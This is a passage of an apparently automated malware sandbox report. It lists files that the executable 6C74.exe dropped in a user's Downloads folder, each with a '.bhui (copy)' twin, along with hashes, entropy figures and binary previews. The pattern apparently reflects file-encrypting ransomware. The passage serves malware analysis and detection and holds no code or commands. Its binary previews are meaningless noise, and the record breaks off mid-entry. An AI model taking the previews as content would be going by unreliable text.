File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832653597175953
Encrypted:	false
SSDEEP:	24:mVV+c6Ma0IpbUOj8mXqvkgKU/+24CuReHCO6yORsGje/zqQQm/6WbD:mVVX6MfyBjzc+IuRaCO6yE8qQQCnD
MD5:	63131152309E9821EDC50845A8C07DF6
SHA1:	4825560BC6547519FBCB1FC965A9AF3B1F830ED1
SHA-256:	3E4B07A91E43D8CA1245448B7843B54A521488C0D163009F05541767686F5E89
SHA-512:	3EF98219A73EE967E02CB97A21D227BDD6B308022567DCB2B2903D65319021BD77856AB4448FFEA5754F76B0D23C993A13D4B4E09DE26481ECE0D20B01B48F82
Malicious:	false
Reputation:	unknown
Preview:	GLTYD6.n$..]...C.n..2.#.}>..N.....'..-{f5.+..-.........Fa..^:Pk..R..zm...{.M.....i.YA.w....Q.3...r..AC..._....G.U...o/..f...$.b.n!..L..X,.U.....&D..#/..l.Xk..Ie%....X..G;.v...<..yx..."..l%....Xu...7g...}!{..yhyY.^..av.{fb....T.........~2v\|&...6.E-....[LH.L."h.....k....X2.#..:.\L..4R....O.`4+N...n.^...X...e1....Hq..##......9.:5......Gs.k.<[.~..>..<P...8.O......lSk.K.....H.I...Z.y[..4&uW.\|Nf.Op/_..l.T..AUp.z..3.97a.S.r.P.q+...K..B.8..#..{.........$.p...."....h^...U...n..=.d...j...'..T...'......f4.RI......Q..mr....&Y........\.a..U.....'w...@<?(J.r...uS....>?.S.F\.d.=[LF\|oyw.#.w..y..)&..,.jf.n... j&...N.......bv.1.%.Y.~....8...V..^.$.kU..v.c....o.......H9....2+.;....`....W'.R..._NXg.v...<.....'..8C..,c.<Oi.+.lFV....6.g8j.!..p.L...F))n.>..C......m.\d...9.*of2@{!N......$W.nB...[..B&.2....pZ.g.{.\|..t..Hq+.^.......gb..Gq.To...(....pLFH.`..n.S.e5..'.-...........#T.hTy-....'c.@oL}s}...Rq....b}&.K%.(.N......O..Y#..as.3...g.: .U..2.EQ..."5..gC

C:\Users\user\Downloads\GLTYDMDUST.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832653597175953
Encrypted:	false
SSDEEP:	24:mVV+c6Ma0IpbUOj8mXqvkgKU/+24CuReHCO6yORsGje/zqQQm/6WbD:mVVX6MfyBjzc+IuRaCO6yE8qQQCnD
MD5:	63131152309E9821EDC50845A8C07DF6
SHA1:	4825560BC6547519FBCB1FC965A9AF3B1F830ED1
SHA-256:	3E4B07A91E43D8CA1245448B7843B54A521488C0D163009F05541767686F5E89
SHA-512:	3EF98219A73EE967E02CB97A21D227BDD6B308022567DCB2B2903D65319021BD77856AB4448FFEA5754F76B0D23C993A13D4B4E09DE26481ECE0D20B01B48F82
Malicious:	false
Reputation:	unknown
Preview:	GLTYD6.n$..]...C.n..2.#.}>..N.....'..-{f5.+..-.........Fa..^:Pk..R..zm...{.M.....i.YA.w....Q.3...r..AC..._....G.U...o/..f...$.b.n!..L..X,.U.....&D..#/..l.Xk..Ie%....X..G;.v...<..yx..."..l%....Xu...7g...}!{..yhyY.^..av.{fb....T.........~2v\|&...6.E-....[LH.L."h.....k....X2.#..:.\L..4R....O.`4+N...n.^...X...e1....Hq..##......9.:5......Gs.k.<[.~..>..<P...8.O......lSk.K.....H.I...Z.y[..4&uW.\|Nf.Op/_..l.T..AUp.z..3.97a.S.r.P.q+...K..B.8..#..{.........$.p...."....h^...U...n..=.d...j...'..T...'......f4.RI......Q..mr....&Y........\.a..U.....'w...@<?(J.r...uS....>?.S.F\.d.=[LF\|oyw.#.w..y..)&..,.jf.n... j&...N.......bv.1.%.Y.~....8...V..^.$.kU..v.c....o.......H9....2+.;....`....W'.R..._NXg.v...<.....'..8C..,c.<Oi.+.lFV....6.g8j.!..p.L...F))n.>..C......m.\d...9.*of2@{!N......$W.nB...[..B&.2....pZ.g.{.\|..t..Hq+.^.......gb..Gq.To...(....pLFH.`..n.S.e5..'.-...........#T.hTy-....'c.@oL}s}...Rq....b}&.K%.(.N......O..Y#..as.3...g.: .U..2.EQ..."5..gC

C:\Users\user\Downloads\GLTYDMDUST.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84012580231255
Encrypted:	false
SSDEEP:	24:6aU6CWCqMzKjIim7nPDBqqU0WWBEUBvDhky88cXVIK9H047tJl5nWbD:tU6CLRzKjwhPBE2vDhDfcXVTU437ED
MD5:	DEC119210449D710769349C3438405E4
SHA1:	83F8DE751BB562F3B0970C2FCCDD678C571BD379
SHA-256:	8D71AC256E411E3497CC39C782C777969D256496F5BC7660B6ABB765E18D20D8
SHA-512:	784B8749996B134D4C6A289FAF27BF574E481211D8A0453333713255B2762184C0EFFBAC64633889D12F3F36FF45F667C8D1C47D1AA486CDD294A5FF39F94D06
Malicious:	false
Reputation:	unknown
Preview:	GLTYDK.(}p.......T.`.J.t>....w........Dr.....n.....~.P...t..A.&..'...m.m...7.....M..NXo..5.J..}.p..Ea.K...7.Z..D.19........[.-.....e]1......y.....dqf...@...Z......1Ff=.../..M)S_.{...".....J~....J0...7He....OksO..-F.....2.+.d.x..6../...hL=;NZ.......).^...d...7......?.9.V.R...-._'...^.f.uG.q.p... .0..:X<.}.U\.......9.e.(_...<...V].".1....^t..$.X.............R%f_.].:..O2...~~tFWV0..6."....d..H/[t...b..>...hnG.eAhu..l...<......-w.Ek.-W..v6.......a6l;.....VH:jE..N....@#..t.l.g....15},.'.....x...f......./.e.....~....\|X.J.....q6..zM..z.@..T...~.........4..?...../&x....f.....q3~5...........v.X..0G..;bs.yz.fz6......V.....>....Q...X..!s...H...]i.K.Ek.....p..6.....5.W.D.\|a~...@..T].Q..%h7..%...V+...M..G....V..H..NT..........p...e....`ry.......E.........N..oZZ......uh..M.i.%/J......_w.x... n.@k.p...k...3..P..@2. S..9..m.t..Uc.....YD..s.X.<....9pF=.!P....0:xW$H..............U..].Ifh>8.,d....j.....f..k6.....!.y..P.8..........}).....PM:(.r.Z..D

C:\Users\user\Downloads\GLTYDMDUST.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84012580231255
Encrypted:	false
SSDEEP:	24:6aU6CWCqMzKjIim7nPDBqqU0WWBEUBvDhky88cXVIK9H047tJl5nWbD:tU6CLRzKjwhPBE2vDhDfcXVTU437ED
MD5:	DEC119210449D710769349C3438405E4
SHA1:	83F8DE751BB562F3B0970C2FCCDD678C571BD379
SHA-256:	8D71AC256E411E3497CC39C782C777969D256496F5BC7660B6ABB765E18D20D8
SHA-512:	784B8749996B134D4C6A289FAF27BF574E481211D8A0453333713255B2762184C0EFFBAC64633889D12F3F36FF45F667C8D1C47D1AA486CDD294A5FF39F94D06
Malicious:	false
Reputation:	unknown
Preview:	GLTYDK.(}p.......T.`.J.t>....w........Dr.....n.....~.P...t..A.&..'...m.m...7.....M..NXo..5.J..}.p..Ea.K...7.Z..D.19........[.-.....e]1......y.....dqf...@...Z......1Ff=.../..M)S_.{...".....J~....J0...7He....OksO..-F.....2.+.d.x..6../...hL=;NZ.......).^...d...7......?.9.V.R...-._'...^.f.uG.q.p... .0..:X<.}.U\.......9.e.(_...<...V].".1....^t..$.X.............R%f_.].:..O2...~~tFWV0..6."....d..H/[t...b..>...hnG.eAhu..l...<......-w.Ek.-W..v6.......a6l;.....VH:jE..N....@#..t.l.g....15},.'.....x...f......./.e.....~....\|X.J.....q6..zM..z.@..T...~.........4..?...../&x....f.....q3~5...........v.X..0G..;bs.yz.fz6......V.....>....Q...X..!s...H...]i.K.Ek.....p..6.....5.W.D.\|a~...@..T].Q..%h7..%...V+...M..G....V..H..NT..........p...e....`ry.......E.........N..oZZ......uh..M.i.%/J......_w.x... n.@k.p...k...3..P..@2. S..9..m.t..Uc.....YD..s.X.<....9pF=.!P....0:xW$H..............U..].Ifh>8.,d....j.....f..k6.....!.y..P.8..........}).....PM:(.r.Z..D

C:\Users\user\Downloads\GLTYDMDUST.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850570053617365
Encrypted:	false
SSDEEP:	24:HJv04wQor3CfptDDxjDq24HanGM5coS/HWcGaOHeB27F5EqpTwgMVIlWbD:pv0f4ljP46bavWcGsuzVpTwhiiD
MD5:	972CFC9D39FBCD7924CC6834CC2E1CBA
SHA1:	D25BCDA077D817BB004F306AA5D772E10DDDF2CA
SHA-256:	9E5C2A7010F844C7A2CBA5A03EE901447F302F544F53C40955928F7377E08B48
SHA-512:	280F3C2DC37A65772C421CB08D3E2186CD4F922B9D00F7E9D6AA82729EFC22479FD3C068E2E80C2A703B6026F7C1E834CC167E7929555D0141DD44E5087D9E21
Malicious:	false
Reputation:	unknown
Preview:	GLTYDX$+."4z.jV\|.&.6..Q.N....\|..J...?....d........../g....)..{.'..<XG=&.LD%O.s..c..5.................E.,..=@."....]...V...2.s..7./...G..9.Ek....v.mj^.....rd...k...F..p.........k.d/.b..g....J..p.....H.Eg>.\...p.1.BW....;.... ....Zi....ItF..'..m.................3..8i~Y.:..]?U^]$P..V.s(.u...5...{..[(..,.9....5.@..c....l.....X...D....>g.3%z^@.4...&.W....../..&..m........cB..hb.]...T..n.;..#...U-j.......7q}.\...i....1 pdw.<..OO..I....(....2d......6...... 2f[...........w....\|.c.ovi.%%.......T........3#i..+....'?..W+...........Tj..)..A....H^.2%...WU.=.._X_.7.\|..........Y...L.7]uw..6~v.......p.I....8zH.b..A..a......U...kC'O...l.....fAGJ.......g=...I\|.o.hB.K.0.\G.R.Y..b..!Z....AE..3d....ew.;.an..w.4Y..R/.^m.X......3.&..v.l..?.^-.......5.....w......M4.!...8q..L.h+._0.O.T.$.O....qf.Q.&._7....K.i.D81.V.ZM.&.eI==#9.Fr..Cka..koVj)..i.]Z.^zC..'P.v.C..f8.....,.e.g..3.v.fu.fTuN..\|..?...g.(.Q={......8i=.....j..T...k$...R3..p..U..-.-..H...(u.z

C:\Users\user\Downloads\GLTYDMDUST.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850570053617365
Encrypted:	false
SSDEEP:	24:HJv04wQor3CfptDDxjDq24HanGM5coS/HWcGaOHeB27F5EqpTwgMVIlWbD:pv0f4ljP46bavWcGsuzVpTwhiiD
MD5:	972CFC9D39FBCD7924CC6834CC2E1CBA
SHA1:	D25BCDA077D817BB004F306AA5D772E10DDDF2CA
SHA-256:	9E5C2A7010F844C7A2CBA5A03EE901447F302F544F53C40955928F7377E08B48
SHA-512:	280F3C2DC37A65772C421CB08D3E2186CD4F922B9D00F7E9D6AA82729EFC22479FD3C068E2E80C2A703B6026F7C1E834CC167E7929555D0141DD44E5087D9E21
Malicious:	false
Reputation:	unknown
Preview:	GLTYDX$+."4z.jV\|.&.6..Q.N....\|..J...?....d........../g....)..{.'..<XG=&.LD%O.s..c..5.................E.,..=@."....]...V...2.s..7./...G..9.Ek....v.mj^.....rd...k...F..p.........k.d/.b..g....J..p.....H.Eg>.\...p.1.BW....;.... ....Zi....ItF..'..m.................3..8i~Y.:..]?U^]$P..V.s(.u...5...{..[(..,.9....5.@..c....l.....X...D....>g.3%z^@.4...&.W....../..&..m........cB..hb.]...T..n.;..#...U-j.......7q}.\...i....1 pdw.<..OO..I....(....2d......6...... 2f[...........w....\|.c.ovi.%%.......T........3#i..+....'?..W+...........Tj..)..A....H^.2%...WU.=.._X_.7.\|..........Y...L.7]uw..6~v.......p.I....8zH.b..A..a......U...kC'O...l.....fAGJ.......g=...I\|.o.hB.K.0.\G.R.Y..b..!Z....AE..3d....ew.;.an..w.4Y..R/.^m.X......3.&..v.l..?.^-.......5.....w......M4.!...8q..L.h+._0.O.T.$.O....qf.Q.&._7....K.i.D81.V.ZM.&.eI==#9.Fr..Cka..koVj)..i.]Z.^zC..'P.v.C..f8.....,.e.g..3.v.fu.fTuN..\|..?...g.(.Q={......8i=.....j..T...k$...R3..p..U..-.-..H...(u.z

C:\Users\user\Downloads\GNLQNHOLWB.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842540942115204
Encrypted:	false
SSDEEP:	24:ZTLf3ezvb3Ie5ZAUczO2kIi+oXSMNpmkN9Vqt47yPgB9a+vSW9MaMWjuaLWbD:ZYPjAA2l0XS+PVqy71BNrPUD
MD5:	08E19FE12CEDC29C9290F9815A7D8427
SHA1:	DC334FC03BDFA57ACC7DCFC8E606BE5DDDBD3D1F
SHA-256:	576901D52A8E75EAB29E360E4753533CB06B77662EC9DF4647FECF373E32A024
SHA-512:	A45F5A18B2A9A43E49B103D106AA171438833295E5F8CDF5E4BEEC038D5BCBF2489CA4BE0D6D115CAFF404D54B799D3CD44F87067FE117342AEA0F7A6446C6B7
Malicious:	false
Reputation:	unknown
Preview:	GNLQN6..B.pjl.rU..>.@..A..u...&.'b.D[I......`...5..t.....H].?'..z.xa.aSh@....$.^k..lP..sSs].+...xq/...$...[.4.V<.1.M{y..^......\|^=.+.}..N..........J...l.8.9....jh E'..k.....T..kR..ku....a.[.).D#ES.hi.-..Z...0..N{.......Fn\|.....bj........% n...hw..%I....3.%..\..:@.W.....;...-.M...>"I.d.Dp..o-..M...w...........[E....Y.......[..74r....=..}....iB..$I....go.'.0...u@Li.........9.......^#....*.o..'..}-.S.....+.t.....K.D.MMr....,...t..A.(.).#;N...`...-.F$\I;..I.-...@..PC.`....Ko.7....'...D.AJ....P.t.._.@..7.k7...%..m.{A.C.].......\.+h...R.Y:X.....R:D.........hU.+b...6.(`..1.vM"...s.}...9..O.m$.M2.6>1..p.SU...;q.u;q.v..........Q....E.....u.L.Fj..y.....c.L..2"..5{.[.....ISI;.;zE.'.]K:.K...P..^.v..k+..s...Q.......#...X..fL....p.......&\|..]....6............h...q...Eh.R[g..r.'.)l...uJ.U...3,.<...oqv.S.U..........6...............y.....8....V.-.K...`._^.g$.?4W.A.F.%lQ!.s..O.f..X..rG].\..I.{Lj..TL.O....x.?....]7..{.....\4. ..Gd...~...{}.

C:\Users\user\Downloads\GNLQNHOLWB.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842540942115204
Encrypted:	false
SSDEEP:	24:ZTLf3ezvb3Ie5ZAUczO2kIi+oXSMNpmkN9Vqt47yPgB9a+vSW9MaMWjuaLWbD:ZYPjAA2l0XS+PVqy71BNrPUD
MD5:	08E19FE12CEDC29C9290F9815A7D8427
SHA1:	DC334FC03BDFA57ACC7DCFC8E606BE5DDDBD3D1F
SHA-256:	576901D52A8E75EAB29E360E4753533CB06B77662EC9DF4647FECF373E32A024
SHA-512:	A45F5A18B2A9A43E49B103D106AA171438833295E5F8CDF5E4BEEC038D5BCBF2489CA4BE0D6D115CAFF404D54B799D3CD44F87067FE117342AEA0F7A6446C6B7
Malicious:	false
Reputation:	unknown
Preview:	GNLQN6..B.pjl.rU..>.@..A..u...&.'b.D[I......`...5..t.....H].?'..z.xa.aSh@....$.^k..lP..sSs].+...xq/...$...[.4.V<.1.M{y..^......\|^=.+.}..N..........J...l.8.9....jh E'..k.....T..kR..ku....a.[.).D#ES.hi.-..Z...0..N{.......Fn\|.....bj........% n...hw..%I....3.%..\..:@.W.....;...-.M...>"I.d.Dp..o-..M...w...........[E....Y.......[..74r....=..}....iB..$I....go.'.0...u@Li.........9.......^#....*.o..'..}-.S.....+.t.....K.D.MMr....,...t..A.(.).#;N...`...-.F$\I;..I.-...@..PC.`....Ko.7....'...D.AJ....P.t.._.@..7.k7...%..m.{A.C.].......\.+h...R.Y:X.....R:D.........hU.+b...6.(`..1.vM"...s.}...9..O.m$.M2.6>1..p.SU...;q.u;q.v..........Q....E.....u.L.Fj..y.....c.L..2"..5{.[.....ISI;.;zE.'.]K:.K...P..^.v..k+..s...Q.......#...X..fL....p.......&\|..]....6............h...q...Eh.R[g..r.'.)l...uJ.U...3,.<...oqv.S.U..........6...............y.....8....V.-.K...`._^.g$.?4W.A.F.%lQ!.s..O.f..X..rG].\..I.{Lj..TL.O....x.?....]7..{.....\4. ..Gd...~...{}.

C:\Users\user\Downloads\HMPPSXQPQV.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836083148623822
Encrypted:	false
SSDEEP:	24:zC2l/fWD8IFaw+LLm91RklSpksX+GpD96pPofK9trQo4d60lVL6734QCWbD:zdBI8I/ELWEzUUpAylwLa5D
MD5:	65EDF4FBDCFF88FAA56C60E23A656873
SHA1:	20E73B4B33A5893148FBA1F05CB7170560361956
SHA-256:	59AB3CE6FCFD5D5B2F1427277C0584D21866BE0D6E852EF3485BCBE6EC8C237A
SHA-512:	52DF773E81B70148A00C19952F6F98E31BFE6A210C362D1CF0476F219D88BF161A8912437BED68755F864D3B05BF59D27CF49DD7385731FFF7442E01A19790C1
Malicious:	false
Reputation:	unknown
Preview:	HMPPS...n.(V....c.S+2.u...o..m4.FNse.~.....r..<n............."v}.xp.M5....u.S.[&.Z.T.....-..b^>...........6s.....O...]...A..Q....._...J.s.u...$..b.-l..S6.Ju./.....#..X..Pc../._.O.F9.1..r/..}.%..x.....gFci.x.c#.Q.u=?.....5>$r.. .45.\|.S.V....s...Yd.:...bS.!`.`\MR....E....z'...q.;...'.M....7.....M..6.X......@cy...$-m..6fN.....L.G....r....7..P]Z.tuM.t....#.5...yx"..iU.......(.a...?.3......H....)......j.......#^...@'kU.......(y...<.!2.N...s;@b...f..9}!..fd..)..O3.S.".vr..j.._s.R.*.2...y.&.X.I.....z..{....+...-cw+x._y..A0...r..+\.bR....@....,...,5..hO..Mc..F..,C`f.S2.+.......(.........?a./.<....S.\...d.T..g.c...&]<r...n..#.y.xe.VO.oP2:e....Q%E@.@.nQ]B...%.#q"..W.J...&.M+t...b..(....g..0.U....AcOM....M(....d...;\|...o..&e.\|.sh.....:.'.#../._...L.x.B.>....s.5!7...>>..O..2S.X-Z.....bR.{U.0..%Z..D....n..Pm:\#.W...5...Bx.Q.S..+S..Ks...5)1..T...).ZP.....F.......!C5.iT.WLa..'....{..X. ^JT..6..........8....~.......t,.h.B. ....B.8.b.^..;...@....~D..R

C:\Users\user\Downloads\HMPPSXQPQV.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836083148623822
Encrypted:	false
SSDEEP:	24:zC2l/fWD8IFaw+LLm91RklSpksX+GpD96pPofK9trQo4d60lVL6734QCWbD:zdBI8I/ELWEzUUpAylwLa5D
MD5:	65EDF4FBDCFF88FAA56C60E23A656873
SHA1:	20E73B4B33A5893148FBA1F05CB7170560361956
SHA-256:	59AB3CE6FCFD5D5B2F1427277C0584D21866BE0D6E852EF3485BCBE6EC8C237A
SHA-512:	52DF773E81B70148A00C19952F6F98E31BFE6A210C362D1CF0476F219D88BF161A8912437BED68755F864D3B05BF59D27CF49DD7385731FFF7442E01A19790C1
Malicious:	false
Reputation:	unknown
Preview:	HMPPS...n.(V....c.S+2.u...o..m4.FNse.~.....r..<n............."v}.xp.M5....u.S.[&.Z.T.....-..b^>...........6s.....O...]...A..Q....._...J.s.u...$..b.-l..S6.Ju./.....#..X..Pc../._.O.F9.1..r/..}.%..x.....gFci.x.c#.Q.u=?.....5>$r.. .45.\|.S.V....s...Yd.:...bS.!`.`\MR....E....z'...q.;...'.M....7.....M..6.X......@cy...$-m..6fN.....L.G....r....7..P]Z.tuM.t....#.5...yx"..iU.......(.a...?.3......H....)......j.......#^...@'kU.......(y...<.!2.N...s;@b...f..9}!..fd..)..O3.S.".vr..j.._s.R.*.2...y.&.X.I.....z..{....+...-cw+x._y..A0...r..+\.bR....@....,...,5..hO..Mc..F..,C`f.S2.+.......(.........?a./.<....S.\...d.T..g.c...&]<r...n..#.y.xe.VO.oP2:e....Q%E@.@.nQ]B...%.#q"..W.J...&.M+t...b..(....g..0.U....AcOM....M(....d...;\|...o..&e.\|.sh.....:.'.#../._...L.x.B.>....s.5!7...>>..O..2S.X-Z.....bR.{U.0..%Z..D....n..Pm:\#.W...5...Bx.Q.S..+S..Ks...5)1..T...).ZP.....F.......!C5.iT.WLa..'....{..X. ^JT..6..........8....~.......t,.h.B. ....B.8.b.^..;...@....~D..R

C:\Users\user\Downloads\HQJBRDYKDE.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856081986895652
Encrypted:	false
SSDEEP:	24:hJkQEkxfFC3PPJ9PFS0JVBrRrMkSxSwjVWf9QGkikJU6MqEO3WbD:Lkc9CffPF1/Bkx5jV1ikKfVD
MD5:	00F8AB5296429B27392267C63294050E
SHA1:	6CB7DF7EFDFA63807AEFD0A230C175600E9528A0
SHA-256:	C5049905AA8FA175D9421255C57C541801D557C869055052780970D2C2857F8E
SHA-512:	A70913151F1B627A0FA2683D7BB6502C8F282C090A0B22FC3D9B7EFE6E1F1D4A45F63B795D358826B1043E67B96A23EF492449B2F37A07C49B6EADB755173CB7
Malicious:	false
Reputation:	unknown
Preview:	HQJBRo.2....pB..#...s..Zt..8.L..o..V.XZ._gIS@......I~v..."...S;.....K...v.)...4f.UUd.c.F......Z."......."..YO..<L.).....Y.r...Id..Gl....0.W'C\|%.kc.m.}......A...).>e@.?...6...;V....yHX\h.k&...N.E.@.....g.M"(.....@^6.... ..<.t....M....v1......Pk.[@F.<.N......1..._.S.@.t.M6x..T......1.^.\.,...K.6.....5CN...5.x.~....:.......&....7$.<P....n._.?.'...[....O<..Khn.S#.N .7....jU.......'.\|.1$u.6!S.3.....)D.$.w.......\>aOKY.W...h6d..c..O..3KN...V.sA..]......[.......>g)..Q...[...E&..F...j/..7..T....O.....j0..U..n.Hi...X..0..8.....1.-.Mg.'.x.."...$......e..-.!...f..[\..nG...t2.0."bC/..g.HAP.".7..4.lz.0.=V.{.d.!....>.#.a..c'.r&..v?i......X(.%..J3[.6..UJ.1~7...z...&.v...\......N>.....".y..T6Z.3+.....T.;.........0....:n.?.u...2...[....wK......mL.&n....$ .d..\.....5E..'.[.L.&.(93OG.!%..k.O.c.u...M..D....B-.m..{.~.d..Uy,.@/........+..o.t..H...A_.2..J......2.p.i..u..cb....J!...Z..&.ca8p...So..*03.w...Sp..(..q..>....^..X.......`X.\...VRI.<D-.1u.Xx.

C:\Users\user\Downloads\HQJBRDYKDE.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856081986895652
Encrypted:	false
SSDEEP:	24:hJkQEkxfFC3PPJ9PFS0JVBrRrMkSxSwjVWf9QGkikJU6MqEO3WbD:Lkc9CffPF1/Bkx5jV1ikKfVD
MD5:	00F8AB5296429B27392267C63294050E
SHA1:	6CB7DF7EFDFA63807AEFD0A230C175600E9528A0
SHA-256:	C5049905AA8FA175D9421255C57C541801D557C869055052780970D2C2857F8E
SHA-512:	A70913151F1B627A0FA2683D7BB6502C8F282C090A0B22FC3D9B7EFE6E1F1D4A45F63B795D358826B1043E67B96A23EF492449B2F37A07C49B6EADB755173CB7
Malicious:	false
Reputation:	unknown
Preview:	HQJBRo.2....pB..#...s..Zt..8.L..o..V.XZ._gIS@......I~v..."...S;.....K...v.)...4f.UUd.c.F......Z."......."..YO..<L.).....Y.r...Id..Gl....0.W'C\|%.kc.m.}......A...).>e@.?...6...;V....yHX\h.k&...N.E.@.....g.M"(.....@^6.... ..<.t....M....v1......Pk.[@F.<.N......1..._.S.@.t.M6x..T......1.^.\.,...K.6.....5CN...5.x.~....:.......&....7$.<P....n._.?.'...[....O<..Khn.S#.N .7....jU.......'.\|.1$u.6!S.3.....)D.$.w.......\>aOKY.W...h6d..c..O..3KN...V.sA..]......[.......>g)..Q...[...E&..F...j/..7..T....O.....j0..U..n.Hi...X..0..8.....1.-.Mg.'.x.."...$......e..-.!...f..[\..nG...t2.0."bC/..g.HAP.".7..4.lz.0.=V.{.d.!....>.#.a..c'.r&..v?i......X(.%..J3[.6..UJ.1~7...z...&.v...\......N>.....".y..T6Z.3+.....T.;.........0....:n.?.u...2...[....wK......mL.&n....$ .d..\.....5E..'.[.L.&.(93OG.!%..k.O.c.u...M..D....B-.m..{.~.d..Uy,.@/........+..o.t..H...A_.2..J......2.p.i..u..cb....J!...Z..&.ca8p...So..*03.w...Sp..(..q..>....^..X.......`X.\...VRI.<D-.1u.Xx.

C:\Users\user\Downloads\LFOPODGVOH.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838263506005945
Encrypted:	false
SSDEEP:	24:Ve2lEVo/DTGkkULSM0LEca9cH9+72iI6WZueBGWckwW91oWbD:Vxua/3hLVc6cH9NiI6WuesV5W91tD
MD5:	1DD6B3785E6C65F5682588CDC19B1521
SHA1:	E101176E4296042EF2975BBE7223C1CF84410CC8
SHA-256:	ADED75F8AAC687606B73A21E7FC7316AE84E3A2A0D3D633940A15FF53861A0C1
SHA-512:	690868CC494FFD5CEA92E4E73053A5A8101BFC69384627532E37788BAB70E09EBCF30A88B94D07E9AE0A66ED2AC7426AFE235F26E2CF1C23278C286DAB7CFF18
Malicious:	false
Reputation:	unknown
Preview:	LFOPO......a.$8c'.q.{..1.`b..8D+Vi.%2..Y..:h.\|.!.Q.R....aS..I%...Tu..Ny....p.m..rjp4..Q.U.Q....,+.# .I...6#.5....}.m...'1)a3....>...)..;...T..ld@.(.....msD G.9`.~.T...a.S....g... ....b.a........#_.K.c=7.>....=./...yJ.9..\|l{A...;7.W.$...`.]..?..m.1.X(.#.\|;...G..;.=x....49..E...;6....\h..s........4..\|....3P......;g.......3dI...:-.-SP...e.m7.$.Fvy(3...N.../..{9k.#(.2..X..3QMX...e....=.........d.S).$.n:ek......9p....J...D.J..90..:mC.>..)Op..Ic.:..8...,Z_z]..j.Y.Bz....5........mX..d`o%.S`..f4...~H.....`...(z..[.@.q....B.;.8.5C.B.8.-=%....3Ep=sQ=..G.b..@.+....\x....8....N}/..k.......D.C..Bq.xx.......a62..L.!Y6.@K.g../.W\|.F..9.(..nR."v.bI..J..2zd.".&.:(.....1 M..(F..K.....K.{..NZ...t.".%.(.OC6T..;'\|..LI......H._.Z....q=......d.Q~.y..E.....{.)$AF....M3.T...~...Q[G.3..]._.3QK.n..z....j..5)l..R3..[4+..8.d.....:.....@...9........B....SE..J......N..nL..P/..pH.I...L.p=...9.2...z.L.k..Jf.g....KEl......+!.... c..ym.q...Q3....... ..@..}.5..j.}k

C:\Users\user\Downloads\LFOPODGVOH.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838263506005945
Encrypted:	false
SSDEEP:	24:Ve2lEVo/DTGkkULSM0LEca9cH9+72iI6WZueBGWckwW91oWbD:Vxua/3hLVc6cH9NiI6WuesV5W91tD
MD5:	1DD6B3785E6C65F5682588CDC19B1521
SHA1:	E101176E4296042EF2975BBE7223C1CF84410CC8
SHA-256:	ADED75F8AAC687606B73A21E7FC7316AE84E3A2A0D3D633940A15FF53861A0C1
SHA-512:	690868CC494FFD5CEA92E4E73053A5A8101BFC69384627532E37788BAB70E09EBCF30A88B94D07E9AE0A66ED2AC7426AFE235F26E2CF1C23278C286DAB7CFF18
Malicious:	false
Reputation:	unknown
Preview:	LFOPO......a.$8c'.q.{..1.`b..8D+Vi.%2..Y..:h.\|.!.Q.R....aS..I%...Tu..Ny....p.m..rjp4..Q.U.Q....,+.# .I...6#.5....}.m...'1)a3....>...)..;...T..ld@.(.....msD G.9`.~.T...a.S....g... ....b.a........#_.K.c=7.>....=./...yJ.9..\|l{A...;7.W.$...`.]..?..m.1.X(.#.\|;...G..;.=x....49..E...;6....\h..s........4..\|....3P......;g.......3dI...:-.-SP...e.m7.$.Fvy(3...N.../..{9k.#(.2..X..3QMX...e....=.........d.S).$.n:ek......9p....J...D.J..90..:mC.>..)Op..Ic.:..8...,Z_z]..j.Y.Bz....5........mX..d`o%.S`..f4...~H.....`...(z..[.@.q....B.;.8.5C.B.8.-=%....3Ep=sQ=..G.b..@.+....\x....8....N}/..k.......D.C..Bq.xx.......a62..L.!Y6.@K.g../.W\|.F..9.(..nR."v.bI..J..2zd.".&.:(.....1 M..(F..K.....K.{..NZ...t.".%.(.OC6T..;'\|..LI......H._.Z....q=......d.Q~.y..E.....{.)$AF....M3.T...~...Q[G.3..]._.3QK.n..z....j..5)l..R3..[4+..8.d.....:.....@...9........B....SE..J......N..nL..P/..pH.I...L.p=...9.2...z.L.k..Jf.g....KEl......+!.... c..ym.q...Q3....... ..@..}.5..j.}k

C:\Users\user\Downloads\LFOPODGVOH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8477730696722166
Encrypted:	false
SSDEEP:	24:2l72htmWOBVK8arm0nCc4vr+EdOJdPpSD196+/3xZWrkctHcPVnWbD:2E4BVw7C5+EXD11/BKkM/D
